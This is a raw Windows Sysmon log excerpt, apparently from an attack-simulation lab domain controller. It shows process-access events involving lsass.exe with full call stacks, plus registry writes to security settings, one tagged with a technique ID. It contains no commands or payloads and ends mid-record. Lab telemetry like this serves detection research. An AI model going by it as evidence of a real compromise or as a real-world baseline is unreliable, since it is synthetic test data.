13:29:56.717{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.717{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:56.717{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000592) 10341000x80000000000000009986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.670{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.670{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:56.529{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000009982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:56.529{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000009971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+58a7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:56.482{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrityDWORD (0x00000001) 13241300x80000000000000009966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:56.482{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\Parameters\requiresignorsealDWORD (0x00000001) 13241300x80000000000000009965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:56.482{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\requiresecuritysignatureDWORD (0x00000001) 13241300x80000000000000009964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:56.482{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\enablesecuritysignatureDWORD (0x00000001) 13241300x80000000000000009963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1101SetValue2021-01-14 13:29:56.482{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 10341000x80000000000000009962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.264{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:56.264{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 